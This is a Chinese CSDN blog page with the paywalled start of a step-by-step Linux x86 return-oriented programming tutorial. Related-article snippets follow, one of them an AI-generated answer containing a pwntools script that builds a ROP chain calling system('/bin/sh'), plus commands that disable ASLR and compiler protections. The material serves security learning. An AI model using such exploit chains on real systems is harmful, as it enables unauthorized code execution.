一步一步学ROP之linux_x86篇

最新推荐文章于 2025-05-02 17:15:00 发布
最新推荐文章于 2025-05-02 17:15:00 发布
阅读量5.7k 收藏 9
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 系统安全 文章标签: linux x86 ROP 操作系统 内存攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/AliMobileSecurity/article/details/51838110
本文详细介绍了如何学习Return-oriented Programming (ROP)技术,从程序流劫持的概念出发,逐步讲解了如何利用ROP绕过DEP和ASLR防护,包括栈溢出、ret2libc和ROP链的构造。通过实例展示了在Linux_x86环境下,如何编写溢出攻击的exploit,强调了在不同防御机制下的解决方案,并提供了后续学习资源。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一步一步学ROP之linux_x86篇

作者:蒸米@阿里聚安全



一、序

ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的学好ROP还是得从基础的x86系统开始,但看官请不要着急,在随后的教程中我们还会带来linux_x64以及android (arm)方面的ROP利用方法,欢迎大家继续学习。

小编备注:文中涉及代码可在文章最后的github链接找到。


二、Control Flow Hijack 程序流劫持

比较常见的程序流劫持就是栈溢出,格式化字符串攻击和堆溢出了。通过程序流劫持,攻击者可以控制PC指针从而执行目标代码。为了应对这种攻击,系统防御者也提出了各种防御方法,最常见的方法有DEP(堆栈不可执行),ASLR(内存地址随机化),Stack Protector(栈保护)等。但是如果上来就部署全部的防御,初学者可能会觉得无从下手,所以我们先从最简单的没有任何保护的程序开始,随后再一步步增加各种防御措施,接着再学习绕过的方法,循序渐进。

首先来看这个有明显缓冲区溢出的程序:



这里我们用

#bash
gcc -fno-stack-protector -z execstack -o level1 level1.c


这个命令编译程序。-fno-stack-protector和-z execstack这两个参数会分别关掉DEP和Stack Protector。同时我们在shell中执行:



这几个指令。执行完后我们就关掉整个linux系统的ASLR保护。

接下来我们开始对目标程序进行分析。首先我们先来确定溢出点的位置,这里我推荐使用pattern.py这个脚本来进行计算。我们使用如下命令:



来生成一串测试用的150个字节的字符串:


最低0.47元/天 解锁文章

200万优质内容无限畅学
【逆向习记录】习《一步一步ROP_x86
卦星的专栏
01-11 1558
1.概述 通过前面三文章,习栈帧,GOT表,PLT表,接下来就可以进行漏洞利用,漏洞利用习最好的方法就是利用经典,其中经典教里面最经典的当属蒸米大神的一步一步系列 一步一步ROPlinux_x86 – 蒸米 蒸米大神的文章,是实战类型,里面有不少细节的东西,对于我这种没有基础的人来讲,如果不理解是很容易忘记的,因此进行原理上的习探索 环境:ubuntu 16.04 编译需要在原...
【逆向习记录】习《一步一步ROP_x64》
卦星的专栏
01-12 1144
1.概述 通过前面几文章,基本上搞定了x86的漏洞原理,针对x64的还需要进一步习,依然利用最经典的当属蒸米大神的一步一步系列 一步一步ROPlinux_x64 – 蒸米 环境:ubuntu 16.04 2.linux x86与x64的区别 这里引用一下上面文章中的语言: linux_64与linux_86的区别主要有两点: 1.首先是内存地址的范围由32位变成了64位。但是可以使用...
Linux操作系统系统编程:x86-64架构下的系统调用
最新发布
深度Linux
05-02 1911
read()系统调用是一个很好的初始示例,可以用来探索内核的系统调用机制。它在fs/read_write.c中作为一个简短的函数实现,大部分工作由vfs_read()函数处理。从调用的角度来看,这段代码最有趣的地方是函数是如何使用SYSCALL_DEFINE3()宏来定义的。实际上,从代码中,甚至并不立即清楚该函数被称为什么。fdput(f);return ret;这些SYSCALL_DEFINEn()宏是内核代码定义系统调用的标准方式,其中n后缀表示参数计数。
一步一步ROP x86Linux
zsj2102的专栏
11-16 1171
原文地址:http://drops.wooyun.org/tips/6597 0x00 序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始,但看官请不要着急,在随
一步一步ROP Linux x86 习笔记
chihie的博客
07-20 838
一步一步ROP Linux x86 习笔记 一无任何防护 二开启DEP 三开启DEP和ASLR 四开启DEP和ASLR无libc一步一步ROP Linux x86 习笔记这部分文章主要依据的是蒸米大神的一步一步ROP系列文章,我也是跟着做的,本文主要记录其中的问题和实验没有成功的地方。一、无任何防护在github可以找到相关的资料,不用自己编译漏洞代码了,也有写好的exp。 从最基础的开
Linux_x86栈溢出攻击实验——写在前面的话
zd454909951的博客
09-23 508
师父说,要想在安全这个行业走得远,首先要看兴趣。其实我有些怀疑自己的兴趣,不过干一行爱一行。 最近由于某种原因开始接触二进制漏洞,特别小白那种,虽然漏洞原理两三句话说得清清楚楚,但要实际操作起来真的不知如何下手。因此将自己的从0到1的经历写出来分享跟我一样的小白,尽可能做到超级详细通俗易懂,一方面记录自己的习过程以及踩过的坑,另一方面希望能坚持更新博客也给自己坚持习的动力,希望在这个过程中培养...
蒸米ROP习笔记(一步一步 ROPLinux_x86
niu_niu_的博客
04-15 3014
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想习如何使用Mar
一步一步ROP之gadgets和2free
omnispace的博客
03-06 2567
原文: http://drops.wooyun.org/binary/10638 0x00序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术,可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x64的ROP攻击一步一步ROPlinux_x86http://d
一步一步ROP之Android ARM 32位》 源码修改版之增加gadgets
06-08
蒸米的代码基础上,加了sqlite3代码便于方便查找gadgets。。。。。。。。。。。。。。。。。。。。。。。。。。。。
一步一步ROP——ROP
weixin_42390670的博客
07-24 823
(接上文) 接下来我们打开ASLR保护。 sudo -s echo 2 > /proc/sys/kernel/randomize_va_space` 现在我们再回头测试一下level2的exp,发现已经不好用了。 #!bash $python exp2.py [+] Started program './level2' [*] Switching to interactive mode ...
一步一步ROP——shellcode和ret2libc
weixin_42390670的博客
07-23 1429
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始,但看官请不要着急,在随后的教程中我们还会带来linux_x64以及android (arm)方面的ROP利用方法。 1 C...
一步一步 ROPlinux_x64 -level5
weixin_43489686的博客
02-02 1661
这道题是来自蒸米的一步一步ROPlinux_x64中的level5,主要考察的是中级ROP中的__libc_csu_init。 原理 __libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000...
一步一步ROPlinux_x64
HiTaQini
11-20 2184
0x00 序ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。
一步一步ROP之Android ARM 32位 -- 阅读笔记及实践
andy7002的博客
06-08 2019
0x00 前言   本文是蒸米的《一步一步ROP之Android ARM 32位》读书笔记,自己动手做了一遍,记录了遇到不一样的地方和问题,4个程序全部运行成功。 0x01 简单的例子(level6) #include #include #include void callsystem() { system("/system/bin/sh"); } void vu
linux内核rop姿势详解,一步一步ROPlinux_x86
weixin_36378771的博客
05-02 321
0x00本文仅解释说明蒸米大神一步一步ROPlinux_x86,读者应先阅读这文章,遇到问题再来看我这文章。阅读完这两文章后,我们会理解ROP(返回导向编程),DEP(堆栈不可执行),ASLR(内存地址随机化),Stack Protector(栈保护),Memory Leak。0x01第一个问题:为什么要构造成”A”*140+ret字符串,这个140是怎么来的呢?要回答这个问题,我们需...
pwn习(一)
weixin_33701617的博客
08-12 1344
实战前的准备 pwn在ctf中算是一个门槛较高的分支,而且这方面的资料也相对较少,所以习pwn的人也是相对较少的。我本人呢,是一个菜鸟,本科不是计算机系的,习这个完全是出于兴趣。写这些东西,一来是记录自己的习状况,二来呢,就是希望给正准备踏上pwn这条路的朋友们,提供一点思路。 废话不多说,开始进入正题: 1. 习pwn所需要的...
kali 使用Rop
02-21
### 使用 ROP 技术进行漏洞开发 在 Kali Linux 中利用返回导向编程 (Return-Oriented Programming, ROP) 进行漏洞开发涉及多个方面。为了有效实施这一技术,理解其基本概念至关重要。 #### 准备工作环境 安装必要的工具包对于准备攻击环境非常重要。通常情况下,在 Kali Linux 上已经预装了许多安全测试软件,但对于特定需求可能还需要额外配置: - 安装 `gdb` 和其他调试器用于分析目标程序的行为。 - 利用 `pwntools` 或者类似的 Python 库来简化 rop 链的构建过程[^1]。 ```bash apt-get update && apt-get install -y gdb pwntools ``` #### 寻找 Gadget Gadgets 是指存在于二进制文件中的短代码片段,这些片段以 `ret` 指令结束并可以被链接起来执行任意操作。寻找 gadgets 的方法之一是通过自动化脚本扫描二进制文件或库文件。`ropper` 工具可以帮助快速定位可用的小工具集合。 ```bash pip3 install ropper ropper --file /path/to/binary ``` #### 构建 ROP Chain 一旦收集到了足够的 gadget 后就可以着手创建一条完整的 ROP chain 来实现预期功能。这一步骤往往依赖于对目标应用程序内部逻辑的理解以及所处平台架构的知识(比如 x86 vs x64)。编写一个简单的 python 脚本来组合选定的小工具,并将其发送给易受攻击的服务作为输入数据流的一部分。 ```python from pwn import * binary_path = './vulnerable_binary' elf = ELF(binary_path) rop = ROP(elf) pop_rdi_ret = 0x00000000004012b3 # Example address found using 'ropper' payload = b'A' * offset_to_return_address payload += pack(pop_rdi_ret) payload += pack(next(elf.search(b'/bin/sh'))) payload += pack(elf.symbols['system']) process(binary_path).sendline(payload) ``` #### 测试与调整 最后阶段是对整个流程进行全面验证,确保每一步都能按计划顺利运行。如果遇到任何问题,则需回溯检查之前的工作成果直至找到错误所在之处。此过程中可能会涉及到多次迭代优化 payload 结构或是重新评估初始假设条件。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值